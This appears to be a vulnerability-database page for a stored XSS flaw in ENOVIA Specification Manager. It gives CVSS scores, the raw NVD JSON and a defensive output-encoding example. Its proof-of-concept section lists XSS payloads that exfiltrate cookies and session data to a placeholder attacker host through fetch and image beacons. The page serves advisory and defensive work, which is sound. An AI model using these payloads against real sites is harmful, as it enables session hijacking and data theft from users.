Security Vulnerability Report
CVE-2025-10556 CVSS 8.7 HIGH

CVE-2025-10556

Published: 2025-10-13 08:15:39
Last Modified: 2025-10-21 19:57:01

Description

A stored Cross-site Scripting (XSS) vulnerability affecting Specification Management in ENOVIA Specification Manager, from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x, allows an attacker to execute arbitrary script code in a user's browser session.

Read together with the CVSS vector (PR:L, UI:R, S:C): an authenticated user with low privileges stores the payload through Specification Management, and it executes later in the browser of any other user who views the affected content. The script therefore runs with the viewing user's session and privileges, not the attacker's, which is why the impact is rated against the victim rather than the low-privileged account that planted it.

CVSS Details

Two CVSS v3.1 assessments are attached to this record. The 8.7 HIGH shown in the page header is the vendor's (Secondary) score; NVD's own (Primary) assessment of the same issue is 5.4 MEDIUM. Both agree on every exploitability metric (network, low complexity, low privileges, user interaction required, scope changed) and differ only in impact: the vendor rates confidentiality and integrity High, NVD rates both Low.

Vendor (Secondary) CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Exploitability / Impact sub-scores
2.3 / 5.8

NVD (Primary) CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Exploitability / Impact sub-scores
2.3 / 2.7

Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:* - VULNERABLE
3DEXPERIENCE R2023x
3DEXPERIENCE R2024x
3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
The vendor advisory and the NVD record identify only the affected component (Specification Management in ENOVIA Specification Manager); neither names the injectable field nor the rendering context. The payloads below are therefore generic stored-XSS probes of the kind used to confirm CWE-79 during an authorised test, not a verified exploit path for this CVE, and the field names in the comments are assumptions.

html
<!-- CVE-2025-10556: Stored XSS in ENOVIA Specification Manager -->
<!-- The vulnerability exists in Specification Management functionality -->
<!-- Attackers with low privileges can inject malicious scripts via specification fields -->

<!-- Example 1: Basic script injection in specification name field -->
<script>alert(document.cookie)</script>

<!-- Example 2: Event handler injection in specification description -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Example 3: SVG-based payload for specification attributes -->
<svg onload="var img=new Image();img.src='https://attacker.com/log?data='+btoa(document.cookie);">

<!-- Example 4: Full exploitation scenario using fetch API -->
<script>
// Steal session and exfiltrate to attacker server
var sessionData = {
  cookies: document.cookie,
  url: window.location.href,
  user: document.title
};
fetch('https://attacker.com/exfil', {
  method: 'POST',
  body: JSON.stringify(sessionData),
  headers: {'Content-Type': 'application/json'}
});
</script>

<!-- Note: These payloads would be injected into specification management input fields -->
<!-- such as specification name, description, or custom attribute values -->
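The payloads above only matter if a stored field value is written into HTML without encoding for the context it lands in. The block below is an added example, not code from the advisory or from Dassault Systèmes: it renders a constructed "specification" row first by raw concatenation (the CWE-79 pattern) and then with context-aware output encoding, and runs a canary check over both outputs using the page's payloads plus one quote-breaking value that targets the attribute context, which the page's list does not cover. The template, field names and the `title` attribute are illustrative assumptions; ENOVIA's real markup is not described in the advisory.

```javascript
// Added example, not code from the advisory or from Dassault Systèmes: a
// constructed rendering of a "specification" row, first with the field values
// concatenated straight into HTML (the stored-XSS pattern behind CWE-79), then
// with context-aware output encoding. Template and field names are assumptions.

// Constructed stored values: the payloads listed in the PoC section, plus a
// quote-breaking value that targets the attribute context specifically.
const STORED_SPEC = {
  name: '<script>alert(document.cookie)</script>',
  description: '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">',
  attribute: '<svg onload="var img=new Image();img.src=\'https://attacker.com/log?data=\'+btoa(document.cookie);">',
  title: 'Pump" onmouseover="alert(1)',
};

// Vulnerable: raw interpolation into element content and into a quoted attribute.
// Each stored value lands in the page exactly as the attacker typed it.
function renderUnsafe(spec) {
  return `<tr title="${spec.title}">` +
    `<td>${spec.name}</td><td>${spec.description}</td><td>${spec.attribute}</td></tr>`;
}

// Output encoding for HTML element content and for double-quoted attribute
// values: the five characters that can change parsing context become entities.
// Attribute values must additionally always be quoted, as in renderSafe below.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Hardened: same template, every untrusted value encoded for the context it
// lands in. The browser now displays the payload text instead of executing it.
function renderSafe(spec) {
  return `<tr title="${escapeHtml(spec.title)}">` +
    `<td>${escapeHtml(spec.name)}</td><td>${escapeHtml(spec.description)}</td>` +
    `<td>${escapeHtml(spec.attribute)}</td></tr>`;
}

// Canary check for an authorised test: which stored values come back verbatim
// in the rendered HTML? For values containing markup characters, a verbatim
// echo means that sink was not encoded. Plain words echo either way, so seed
// the check with values that contain < > " or &.
function fieldsEchoedRaw(renderFn, spec) {
  const html = renderFn(spec);
  return Object.entries(spec)
    .filter(([, value]) => /[<>"&]/.test(value) && html.includes(value))
    .map(([field]) => field);
}

// Heuristic tripwire on rendered output: an unescaped script/img/svg/iframe tag
// or an inline event handler followed by a quoted value. Correctly encoded
// output never trips it because '<' and '"' have become entities.
function hasActiveMarkup(html) {
  return /<(script|img|svg|iframe)\b|\son\w+\s*=\s*["']/i.test(html);
}

console.log('unsafe echoes raw:', fieldsEchoedRaw(renderUnsafe, STORED_SPEC));
console.log('safe echoes raw:  ', fieldsEchoedRaw(renderSafe, STORED_SPEC));
console.log('unsafe active markup:', hasActiveMarkup(renderUnsafe(STORED_SPEC)));
console.log('safe active markup:  ', hasActiveMarkup(renderSafe(STORED_SPEC)));
```

Two caveats for anyone validating this CVE with the payloads above. First, every listed payload exfiltrates `document.cookie`; if the session cookie carries the `HttpOnly` flag that read returns nothing, but the script still runs inside the victim's authenticated page and can call the application's own endpoints with the victim's session, which is the integrity impact the vendor rates High. Second, the `fetch` and `Image` beacons go to an external host, so a Content-Security-Policy with a restrictive `connect-src` and `img-src` blocks that particular exfiltration without fixing the underlying encoding defect; the fix is output encoding at the sink, as in `renderSafe`, independent of which field the value entered through.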

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10556 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10556",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T08:15:39.107",
    "lastModified": "2025-10-21T19:57:01.243",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Specification Management in ENOVIA Specification Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "r2023x",
                "versionEndIncluding": "r2025x",
                "matchCriteriaId": "A38313EB-6DE1-4460-84B4-559F14BBCC11"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10556",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}